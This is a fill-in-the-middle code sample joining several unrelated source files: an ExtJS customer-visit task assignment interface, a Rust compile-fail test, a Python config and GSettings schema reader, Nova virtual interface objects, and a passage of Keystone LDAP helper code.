// displayMsg : '当前显示数据 {0} - {1} of {2}',
// emptyMsg : '没有数据'
// });
//
// var win = new Ext.Window({
// title : '客户经理',
// id : 'bind',
// layout : 'fit',
// border : false,
// modal : true,
// width : 500,
// height : 400,
// items : [new Ext.grid.GridPanel({
// id : 'grid1',
// loadMask : true,
//// tbar : [{
//// xtype : 'textfield',
//// id : 'searchName',
//// emptyText : '请输入客户经理名称...',
//// width : 150
//// }, {
//// text : '搜索',
//// width : 45,
//// xtype : 'button',
//// handler : function() {
////
//// }
//// }],
// store : store1,
// sm : sm,
// cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
// header : '客户经理名称',
// width : 200,
// dataIndex : 'name',
// align : 'center'
// }, {
// header : '客户经理用户名',
// width : 230,
// dataIndex : 'username',
// align : 'center'
// }]),
// bbar : paging
// })],
// buttons : [{
// text : '确定',
// handler : function() {
// var mrecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
// if (mrecords.length < 1) {
// alert('请选择要做任务的客户经理!');
// return;
// }
// var mids = '';
// for (var j = 0; j < mrecords.length; j++) {
// mids += ',' + mrecords[j].get('id');
// }
//
// Ext.getCmp('bind').close();
// Ext.getCmp('form').getForm().submit({
// waitTitle : '提示',
// waitMsg : '正在提交数据请稍后...',
// url : 'task.do?action=indevi',
// params : {
// mids : mids
// },
// method : 'post',
// success : function(form, action) {
// alert(action.result.myHashMap.msg);
// },
// failure : function(form, action) {
// alert(action.result.myHashMap.msg);
// }
// });
//
// }
// }, {
// text : '取消',
// handler : function() {
// Ext.getCmp('bind').close();
// }
// }]
// });
// win.show(Ext.getBody());
// store1.load({
// params : {
// start : 0,
// limit : 20
// }
// });
//
// }
}, {
text : '分组任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
var sm = new Ext.grid.CheckboxSelectionModel();
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customerGroup.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var win = new Ext.Window({
title : '客户分组',
id : 'bind',
layout : 'fit',
border : false,
modal : true,
width : 500,
height : 400,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
sm : sm,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
header : '客户分组名称',
width : 200,
dataIndex : 'name',
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var grecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (grecords.length < 1) {
alert('请选择客户分组!');
return;
}
var gids = '';
for (var j = 0; j < grecords.length; j++) {
gids += ',' + grecords[j].get('id');
}
Ext.getCmp('bind').close();
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
url : 'task.do?action=group',
params : {
gids : gids
},
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('bind').close();
}
}]
});
win.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20,
all : 0
}
});
}
}, {
text : '客户任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customer.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name', 'number', 'sell_number', 'store_name', 'level', 'phone_number', 'manager',
'backup_number', 'address', 'order_type', 'gps', 'last_visit_time']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var sm = new Ext.grid.CheckboxSelectionModel();
var win1 = new Ext.Window({
title : '选择客户',
id : 'chooseCustomer',
layout : 'fit',
border : false,
modal : true,
width : 800,
height : 600,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
sm : sm,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
header : '客户名称',
width : 100,
dataIndex : 'name',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户编号',
width : 130,
dataIndex : 'number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '专卖证号',
width : 130,
dataIndex : 'sell_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '店铺名称',
width : 200,
dataIndex : 'store_name',
sortable : true,
remoteSort : true,
align : 'left'
}, {
header : '客户级别',
width : 90,
dataIndex : 'level',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '电话号码',
width : 100,
dataIndex : 'phone_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户经理',
width : 120,
dataIndex : 'manager',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '备用号码',
width : 100,
dataIndex : 'backup_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '经营地址',
width : 240,
dataIndex : 'address',
sortable : true,
remoteSort : true,
align : 'left',
renderer : function(value, meta) {
meta.attr = 'title="' + value + '"';
return value;
}
}, {
header : '订货类型',
width : 60,
dataIndex : 'order_type',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : 'GPS(经度,纬度)',
width : 150,
dataIndex : 'gps',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '最近一次拜访时间',
width : 180,
dataIndex : 'last_visit_time',
sortable : true,
remoteSort : true,
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var crecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (crecords.length < 1) {
alert('请选择要拜访的客户!');
return;
}
var size = crecords.length;
var cids = "";
for (var i = 0; i < size; i++) {
cids += ',' + crecords[i].get('id');
}
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
url : 'task.do?action=customerTask',
params : {
cids : cids
},
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
Ext.getCmp('chooseCustomer').close();
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('chooseCustomer').close();
}
}]
});
win1.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20
}
});
}
}, {
text : '自定义任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
var cids = '';
var mid = '';
var win = new Ext.Window({
title : '自定义任务',
id : 'editWin',
layout : 'fit',
border : false,
modal : true,
width : 500,
height : 250,
items : [new Ext.form.FormPanel({
id : 'editForm',
frame : true,
bodyStyle : 'padding : 30px; 20px;',
defaults : {
msgTarget : 'under'
},
height : 'auto',
labelWidth : 80,
labelAlign : 'right',
items : [{
xtype : 'compositefield',
width : 500,
items : [{
fieldLabel : '客户名称',
xtype : 'textfield',
id : 'customer',
allowBlank : false,
width : 300
}, {
text : '浏览…',
xtype : 'button',
handler : function() {
// 选择客户
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customer.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name', 'number', 'sell_number', 'store_name', 'level', 'phone_number', 'manager',
'backup_number', 'address', 'order_type', 'gps', 'last_visit_time']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var sm = new Ext.grid.CheckboxSelectionModel();
var win1 = new Ext.Window({
title : '选择客户',
id : 'chooseCustomer',
layout : 'fit',
border : false,
modal : true,
width : 800,
height : 600,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
sm : sm,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
header : '客户名称',
width : 100,
dataIndex : 'name',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户编号',
width : 130,
dataIndex : 'number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '专卖证号',
width : 130,
dataIndex : 'sell_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '店铺名称',
width : 200,
dataIndex : 'store_name',
sortable : true,
remoteSort : true,
align : 'left'
}, {
header : '客户级别',
width : 90,
dataIndex : 'level',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '电话号码',
width : 100,
dataIndex : 'phone_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户经理',
width : 120,
dataIndex : 'manager',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '备用号码',
width : 100,
dataIndex : 'backup_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '经营地址',
width : 240,
dataIndex : 'address',
sortable : true,
remoteSort : true,
align : 'left',
renderer : function(value, meta) {
meta.attr = 'title="' + value + '"';
return value;
}
}, {
header : '订货类型',
width : 60,
dataIndex : 'order_type',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : 'GPS(经度,纬度)',
width : 150,
dataIndex : 'gps',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '最近一次拜访时间',
width : 180,
dataIndex : 'last_visit_time',
sortable : true,
remoteSort : true,
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var crecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (crecords.length < 1) {
alert('请选择要拜访的客户!');
return;
}
var size = crecords.length;
var cnames = '';
for (var i = 0; i < size; i++) {
cids += ',' + crecords[i].get('id');
cnames += ',' + crecords[i].get('name');
}
Ext.getCmp('customer').setValue(cnames.substring(1));
Ext.getCmp('chooseCustomer').close();
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('chooseCustomer').close();
}
}]
});
win1.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20
}
});
}
}]
}, {
xtype : 'compositefield',
width : 500,
items : [{
fieldLabel : '客户经理',
xtype : 'textfield',
id : 'manager',
allowBlank : false,
width : 300
}, {
text : '浏览…',
xtype : 'button',
handler : function() {
// 选择客户经理
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customerManager.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name', 'username', 'department', 'area']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var win1 = new Ext.Window({
title : '选择客户经理',
id : 'bind',
layout : 'fit',
border : false,
modal : true,
width : 600,
height : 400,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), {
header : '客户经理名称',
width : 130,
dataIndex : 'name',
align : 'center'
}, {
header : '用户名',
width : 130,
dataIndex : 'username',
align : 'center'
}, {
header : '部门',
width : 130,
dataIndex : 'department',
align : 'center'
}, {
header : '片区',
width : 130,
dataIndex : 'area',
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var mrecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (mrecords.length < 1) {
alert('请选择客户经理!');
return;
}
mid = mrecords[0].get('id');
var manager = mrecords[0].get('name');
if (mrecords[0].get('department') != "") {
manager = manager + "-" + mrecords[0].get('department');
}
if (mrecords[0].get('area') != "") {
manager = manager + "-" + mrecords[0].get('area');
}
Ext.getCmp('manager').setValue(manager);
Ext.getCmp('bind').close();
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('bind').close();
}
}]
});
win1.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20
}
});
}
}]
}],
buttons : [{
text : '确定',
handler : function() {
Ext.getCmp('editWin').close();
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
url : 'task.do?action=newCustomerTask',
params : {
mid : mid,
cids : cids,
},
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('editWin').close();
}
}]
})]
});
win.show(Ext.getBody());
}
}]
}]
});
}
return panel;
}
};<|fim▁end|> | waitMsg : '正在提交数据请稍后...',
|
<|file_name|>unsized4.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Test that bounds are sized-compatible.
// Marker trait used as the bound under test; trait bounds carry an
// implicit `Sized` requirement, which the function below violates.
trait T {}
fn f<type Y: T>() {
//~^ERROR incompatible bounds on type parameter Y, bound T does not allow unsized type<|fim▁hole|>
// Intentionally empty entry point: this compile-fail fixture only
// exercises the bound error reported on `f` above.
pub fn main() {
}
<|file_name|>common.py<|end_file_name|><|fim▁begin|>#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2007-2011 Tualatrix Chou <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
import glob
import logging
import ConfigParser
from lxml import etree
log = logging.getLogger('CommonSetting')
class RawConfigSetting(object):
'''Just pass the file path'''
    def __init__(self, path, type=type):
        # `path`: filesystem path of the ini-style config file to read.
        # `type`: expected Python type of the values (bool/int/float/str),
        # used to pick the matching coercion in get_value()/set_value().
        # The default is the *builtin* `type` function, which matches none
        # of the specific types and therefore selects the generic string
        # behaviour.  NOTE(review): the parameter name shadows the builtin.
        self._type = type
        self._path = path
        self.init_configparser()
    def _type_convert_set(self, value):
        """Serialize a Python value into the string form stored on disk.

        Booleans become the literals 'true'/'false'; str-typed values are
        wrapped in single quotes so they round-trip through eval() in
        _type_convert_get(); everything else is passed through unchanged.
        """
        if type(value) == bool:
            if value == True:
                value = 'true'
            elif value == False:
                value = 'false'
        # Hard-coded str type: store "'xxx'" instead of xxx so the quotes
        # mark the value as a string when it is read back.
        if self._type == str:
            value = "'%s'" % value
        return value
def _type_convert_get(self, value):
if value == 'false':
value = False
elif value == 'true':
value = True
# This is a hard code str type, so return '"xxx"' instead of 'xxx'
if self._type == str or type(value) == str:
if (value.startswith('"') and value.endswith('"')) or \
(value.startswith("'") and value.endswith("'")):
value = eval(value)
return value
    def init_configparser(self):
        # (Re)create the parser and load the file from disk; called from
        # __init__ and again after every write so the in-memory state
        # stays in sync with the file.
        self._configparser = ConfigParser.ConfigParser()
        self._configparser.read(self._path)
    def sections(self):
        """Return the list of section names present in the config file."""
        return self._configparser.sections()
def options(self, section):<|fim▁hole|>
    def set_value(self, section, option, value):
        """Write *option* = *value* into *section* and persist to disk.

        The section is created on demand, the whole file is rewritten,
        and the parser is reloaded so subsequent reads see the new
        content.
        """
        value = self._type_convert_set(value)
        if not self._configparser.has_section(section):
            self._configparser.add_section(section)
        self._configparser.set(section, option, value)
        with open(self._path, 'wb') as configfile:
            self._configparser.write(configfile)
        self.init_configparser()
    def get_value(self, section, option):
        """Read *option* from *section*, coerced according to self._type."""
        if self._type:
            # Pick the ConfigParser getter that matches the declared
            # type; anything other than int/float/bool falls back to the
            # plain string `get`.
            if self._type == int:
                getfunc = getattr(self._configparser, 'getint')
            elif self._type == float:
                getfunc = getattr(self._configparser, 'getfloat')
            elif self._type == bool:
                getfunc = getattr(self._configparser, 'getboolean')
            else:
                getfunc = getattr(self._configparser, 'get')
            value = getfunc(section, option)
        else:
            log.debug("No type message, so use the generic get")
            value = self._configparser.get(section, option)
        # Post-process: strip quote wrapping / convert boolean literals.
        value = self._type_convert_get(value)
        return value
class Schema(object):
cached_schema = {}
cached_schema_tree = {}
cached_override = {}
    @classmethod
    def load_override(cls):
        """Parse every *.gschema.override file into cls.cached_override.

        The cache maps schema id -> {key: overridden default value}.
        """
        log.debug("\tLoading override")
        for override in glob.glob('/usr/share/glib-2.0/schemas/*.gschema.override'):
            try:
                cs = RawConfigSetting(override)
                for section in cs.sections():
                    cls.cached_override[section] = {}
                    for option in cs.options(section):
                        cls.cached_override[section][option] = cs.get_value(section, option)
            # A malformed override file is skipped rather than fatal.
            # NOTE(review): the caught exception `e` is never logged, so
            # the failure reason is lost.
            except Exception, e:
                log.error('Error while parsing override file: %s' % override)
    @classmethod
    def load_schema(cls, schema_id, key):
        """Return the default value of *key* in GSettings schema *schema_id*.

        Values from *.gschema.override files take precedence over schema
        defaults.  Returns None when no installed schema defines a
        default for the key.
        """
        log.debug("Loading schema value for: %s/%s" % (schema_id, key))
        # Overrides are loaded lazily, once per process.
        if not cls.cached_override:
            cls.load_override()
        if schema_id in cls.cached_override and \
                key in cls.cached_override[schema_id]:
            return cls.cached_override[schema_id][key]
        if schema_id in cls.cached_schema and \
                key in cls.cached_schema[schema_id]:
            return cls.cached_schema[schema_id][key]
        schema_defaults = {}
        for schema_path in glob.glob('/usr/share/glib-2.0/schemas/*'):
            if not schema_path.endswith('.gschema.xml') and not schema_path.endswith('.enums.xml'):
                #TODO deal with enums
                continue
            # NOTE(review): cached_schema_tree is read here but never
            # written in this method, so this parse cache appears to be
            # ineffective -- confirm before relying on it.
            if schema_path in cls.cached_schema_tree:
                tree = cls.cached_schema_tree[schema_path]
            else:
                tree = etree.parse(open(schema_path))
            for schema_node in tree.findall('schema'):
                if schema_node.attrib.get('id') == schema_id:
                    # Collect every key that declares a <default> node.
                    for key_node in schema_node.findall('key'):
                        if key_node.findall('default'):
                            schema_defaults[key_node.attrib['name']] = cls.parse_value(key_node)
                else:
                    continue
        # Cache all defaults of this schema for later lookups.
        cls.cached_schema[schema_id] = schema_defaults
        if key in schema_defaults:
            return schema_defaults[key]
        else:
            return None
@classmethod
def parse_value(cls, key_node):
log.debug("Try to get type for value: %s" % key_node.items())
value = key_node.find('default').text
#TODO enum type
if key_node.attrib.get('type'):
type = key_node.attrib['type']
if type == 'b':
if value == 'true':
return True
else:
return False
elif type == 'i':
return int(value)
elif type == 'd':
return float(value)
elif type == 'as':
return eval(value)
return eval(value)<|fim▁end|> | return self._configparser.options(section) |
<|file_name|>virtual_interface.py<|end_file_name|><|fim▁begin|># Copyright (C) 2014, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software<|fim▁hole|># License for the specific language governing permissions and limitations
# under the License.
from nova import db
from nova import exception
from nova import objects
from nova.objects import base
from nova.objects import fields
# TODO(berrange): Remove NovaObjectDictCompat
class VirtualInterface(base.NovaPersistentObject, base.NovaObject,
                       base.NovaObjectDictCompat):
    """Versioned object wrapping one row of the virtual_interfaces table."""
    # Version 1.0: Initial version
    VERSION = '1.0'
    fields = {
        'id': fields.IntegerField(),
        'address': fields.StringField(nullable=True),
        'network_id': fields.IntegerField(),
        'instance_uuid': fields.UUIDField(),
        'uuid': fields.UUIDField(),
    }
    @staticmethod
    def _from_db_object(context, vif, db_vif):
        """Copy every declared field from the DB row into *vif*."""
        for field in vif.fields:
            vif[field] = db_vif[field]
        vif._context = context
        vif.obj_reset_changes()
        return vif
    @base.remotable_classmethod
    def get_by_id(cls, context, vif_id):
        """Look up a VIF by integer primary key; returns None if absent."""
        db_vif = db.virtual_interface_get(context, vif_id)
        if db_vif:
            return cls._from_db_object(context, cls(), db_vif)
    @base.remotable_classmethod
    def get_by_uuid(cls, context, vif_uuid):
        """Look up a VIF by its UUID; returns None if absent."""
        db_vif = db.virtual_interface_get_by_uuid(context, vif_uuid)
        if db_vif:
            return cls._from_db_object(context, cls(), db_vif)
    @base.remotable_classmethod
    def get_by_address(cls, context, address):
        """Look up a VIF by its address; returns None if absent."""
        db_vif = db.virtual_interface_get_by_address(context, address)
        if db_vif:
            return cls._from_db_object(context, cls(), db_vif)
    @base.remotable_classmethod
    def get_by_instance_and_network(cls, context, instance_uuid, network_id):
        """Look up the VIF joining an instance and a network; None if absent."""
        db_vif = db.virtual_interface_get_by_instance_and_network(context,
                instance_uuid, network_id)
        if db_vif:
            return cls._from_db_object(context, cls(), db_vif)
    @base.remotable
    def create(self):
        """Insert this object as a new DB row.

        :raises ObjectActionError: if 'id' is already set, i.e. the
            object was created before.
        """
        if self.obj_attr_is_set('id'):
            raise exception.ObjectActionError(action='create',
                                              reason='already created')
        updates = self.obj_get_changes()
        db_vif = db.virtual_interface_create(self._context, updates)
        self._from_db_object(self._context, self, db_vif)
    @base.remotable_classmethod
    def delete_by_instance_uuid(cls, context, instance_uuid):
        """Delete all VIFs belonging to the given instance."""
        db.virtual_interface_delete_by_instance(context, instance_uuid)
class VirtualInterfaceList(base.ObjectListBase, base.NovaObject):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'objects': fields.ListOfObjectsField('VirtualInterface'),
}
child_versions = {
'1.0': '1.0',
}
    @base.remotable_classmethod
    def get_all(cls, context):
        """Return a VirtualInterfaceList of every VIF in the database."""
        db_vifs = db.virtual_interface_get_all(context)
        return base.obj_make_list(context, cls(context),
                                  objects.VirtualInterface, db_vifs)
@base.remotable_classmethod
def get_by_instance_uuid(cls, context, instance_uuid, use_slave=False):
db_vifs = db.virtual_interface_get_by_instance(context, instance_uuid,
use_slave=use_slave)
return base.obj_make_list(context, cls(context),
objects.VirtualInterface, db_vifs)<|fim▁end|> | # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the |
<|file_name|>core.py<|end_file_name|><|fim▁begin|># Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import codecs
import functools
import os.path
import re
import sys
import weakref
import ldap.filter
import ldappool
from oslo_log import log
import six
from keystone import exception
from keystone.i18n import _
from keystone.i18n import _LW
LOG = log.getLogger(__name__)
LDAP_VALUES = {'TRUE': True, 'FALSE': False}
CONTROL_TREEDELETE = '1.2.840.113556.1.4.805'
LDAP_SCOPES = {'one': ldap.SCOPE_ONELEVEL,
'sub': ldap.SCOPE_SUBTREE}
LDAP_DEREF = {'always': ldap.DEREF_ALWAYS,
'default': None,
'finding': ldap.DEREF_FINDING,
'never': ldap.DEREF_NEVER,
'searching': ldap.DEREF_SEARCHING}
LDAP_TLS_CERTS = {'never': ldap.OPT_X_TLS_NEVER,
'demand': ldap.OPT_X_TLS_DEMAND,
'allow': ldap.OPT_X_TLS_ALLOW}
# RFC 4511 (The LDAP Protocol) defines a list containing only the OID '1.1' to
# indicate that no attributes should be returned besides the DN.
DN_ONLY = ['1.1']
_utf8_encoder = codecs.getencoder('utf-8')
def utf8_encode(value):
    """Return *value* as UTF-8 encoded bytes.

    Unicode input is encoded to UTF-8; byte-string input is assumed to
    already be UTF-8 and is returned untouched.

    :param value: A basestring
    :returns: UTF-8 encoded version of value
    :raises: TypeError if value is not basestring
    """
    if isinstance(value, six.binary_type):
        return value
    if isinstance(value, six.text_type):
        return _utf8_encoder(value)[0]
    raise TypeError("value must be basestring, "
                    "not %s" % value.__class__.__name__)
_utf8_decoder = codecs.getdecoder('utf-8')
def utf8_decode(value):
    """Return *value* as a unicode string.

    Byte strings are assumed to be UTF-8 encoded and are decoded; any
    other type is converted with six.text_type().

    :param value: value to be returned as unicode
    :returns: value as unicode
    :raises: UnicodeDecodeError for invalid UTF-8 encoding
    """
    if not isinstance(value, six.binary_type):
        return six.text_type(value)
    return _utf8_decoder(value)[0]
def py2ldap(val):
    """Render a Python value as the unicode string form LDAP expects.

    The LDAP API only accepts strings for values, so every value is
    turned into its unicode representation here; booleans map to the
    literals 'TRUE'/'FALSE'.  A later step UTF-8 encodes the result, as
    required by the python-ldap API.

    :param val: The value to convert to a LDAP string representation
    :returns: unicode string representation of value.
    """
    if not isinstance(val, bool):
        return six.text_type(val)
    return u'TRUE' if val else u'FALSE'
def enabled2py(val):
    """Similar to ldap2py, only useful for the enabled attribute."""
    # The literals 'TRUE'/'FALSE' map to Python booleans.
    try:
        return LDAP_VALUES[val]
    except KeyError:
        pass
    # Some deployments store enabled as an integer flag/bitmask.
    try:
        return int(val)
    except ValueError:
        pass
    # Otherwise treat the raw value as a UTF-8 string.
    return utf8_decode(val)
def ldap2py(val):
    """Convert an LDAP formatted value to Python type used by OpenStack.

    Virtually all LDAP values are stored as UTF-8 encoded strings.
    OpenStack prefers values which are unicode friendly.

    :param val: LDAP formatted value
    :returns: val converted to preferred Python type
    """
    # Currently just a UTF-8 decode; kept as a named wrapper so the
    # conversion policy lives in one place.
    return utf8_decode(val)
def convert_ldap_result(ldap_result):
    """Convert LDAP search result to Python types used by OpenStack.

    Each result tuple is of the form (dn, attrs), where dn is a string
    containing the DN (distinguished name) of the entry, and attrs is
    a dictionary containing the attributes associated with the
    entry. The keys of attrs are strings, and the associated values
    are lists of strings.

    OpenStack wants to use Python types of its choosing. Strings will
    be unicode, truth values boolean, whole numbers int's, etc. DN's will
    also be decoded from UTF-8 to unicode.

    :param ldap_result: LDAP search result
    :returns: list of 2-tuples containing (dn, attrs) where dn is unicode
              and attrs is a dict whose values are type converted to
              OpenStack preferred types.
    """
    py_result = []
    at_least_one_referral = False
    for dn, attrs in ldap_result:
        ldap_attrs = {}
        if dn is None:
            # this is a Referral object, rather than an Entry object
            at_least_one_referral = True
            continue
        for kind, values in six.iteritems(attrs):
            try:
                # 'enabled' gets bool/int conversion; everything else is
                # decoded as a UTF-8 string.
                val2py = enabled2py if kind == 'enabled' else ldap2py
                ldap_attrs[kind] = [val2py(x) for x in values]
            except UnicodeDecodeError:
                # NOTE: the whole attribute is omitted from the result
                # when any single value of it fails to decode.
                LOG.debug('Unable to decode value for attribute %s', kind)
        py_result.append((utf8_decode(dn), ldap_attrs))
    if at_least_one_referral:
        LOG.debug(('Referrals were returned and ignored. Enable referral '
                   'chasing in keystone.conf via [ldap] chase_referrals'))
    return py_result
def safe_iter(attrs):
    """Generate the members of *attrs* one at a time.

    ``None`` yields nothing, a list yields each of its elements, and any
    other value (including tuples and strings) is yielded whole as a
    single item.
    """
    if attrs is not None:
        members = attrs if isinstance(attrs, list) else [attrs]
        for member in members:
            yield member
def parse_deref(opt):
    """Map an alias-dereferencing option name to its ldap constant.

    :param opt: one of the keys of LDAP_DEREF
    :raises ValueError: if *opt* is not a recognised option name
    """
    if opt in LDAP_DEREF:
        return LDAP_DEREF[opt]
    raise ValueError(_('Invalid LDAP deref option: %(option)s. '
                       'Choose one of: %(options)s') %
                     {'option': opt,
                      'options': ', '.join(LDAP_DEREF.keys()), })
def parse_tls_cert(opt):
    """Map a TLS cert-checking option name to its ldap.OPT_X_TLS_* value.

    :param opt: one of the keys of LDAP_TLS_CERTS
    :raises ValueError: if *opt* is not a recognised option name
    """
    try:
        return LDAP_TLS_CERTS[opt]
    except KeyError:
        raise ValueError(_(
            'Invalid LDAP TLS certs option: %(option)s. '
            'Choose one of: %(options)s') % {
                'option': opt,
                'options': ', '.join(LDAP_TLS_CERTS.keys())})
def ldap_scope(scope):
    """Map a search-scope name to its ldap.SCOPE_* constant.

    :param scope: one of the keys of LDAP_SCOPES ('one' or 'sub')
    :raises ValueError: if *scope* is not a recognised scope name
    """
    try:
        return LDAP_SCOPES[scope]
    except KeyError:
        raise ValueError(
            _('Invalid LDAP scope: %(scope)s. Choose one of: %(options)s') % {
                'scope': scope,
                'options': ', '.join(LDAP_SCOPES.keys())})
def prep_case_insensitive(value):
    """Normalize a string for case-insensitive comparison.

    A simplified version of the RFC4518 string-preparation rules:
    lowercase everything, trim surrounding whitespace, and collapse each
    internal whitespace run into a single space.
    """
    folded = value.strip().lower()
    return re.sub(r'\s+', ' ', folded)
def is_ava_value_equal(attribute_type, val1, val2):
    """Returns True if and only if the AVAs are equal.

    When comparing AVAs, the equality matching rule for the attribute type
    should be taken into consideration. For simplicity, this implementation
    does a case-insensitive comparison.

    Note that this function uses prep_case_insenstive so the limitations of
    that function apply here.
    """
    # attribute_type is currently unused: every attribute is compared
    # with the same simplified case-insensitive rule.
    return prep_case_insensitive(val1) == prep_case_insensitive(val2)
def is_rdn_equal(rdn1, rdn2):
    """Returns True if and only if the RDNs are equal.

    * RDNs must have the same number of AVAs.
    * Each AVA of the RDNs must be the equal for the same attribute type. The
      order isn't significant. Note that an attribute type will only be in one
